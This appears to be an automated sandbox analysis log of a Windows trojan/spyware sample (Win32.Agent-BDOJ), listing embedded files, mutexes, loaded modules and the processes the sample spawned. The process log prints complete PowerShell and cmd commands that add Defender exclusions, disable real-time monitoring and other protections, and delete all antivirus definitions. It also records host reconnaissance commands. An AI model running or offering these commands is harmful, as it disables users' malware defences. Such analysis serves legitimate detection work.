                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedispdiag.exej% vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499894318.00007FF8F875A000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474254395.00007FF8E6C8A000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1500274191.00007FF8F918C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499339443.00007FF8F0D18000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498656677.00007FF8E836C000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedispdiag.exej% vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1488411064.00007FF8E7535000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499719654.00007FF8F8326000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499093820.00007FF8E83CA000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498846132.00007FF8E8394000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1500095776.00007FF8F8D8C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeBinary or memory string: OriginalFilenamedispdiag.exej% vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
                Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
                Source: python313.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
                Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
                Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9926987474437627
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/44@7/5
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\bound.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeMutant created: \Sessions\1\BaseNamedObjects\X
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7976
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122Jump to behavior
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeReversingLabs: Detection: 52%
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: set-addPolicy
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: id-cmc-addExtensions
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: can't send non-None value to a just-started generator
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: can't send non-None value to a just-started async generator
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: --help
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: --help
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: can't send non-None value to a just-started coroutine
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeString found in binary or memory: /ADd$
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7976 -s 2228
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: python3.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: libffi-8.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: sqlite3.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: libcrypto-3.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: libssl-3.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
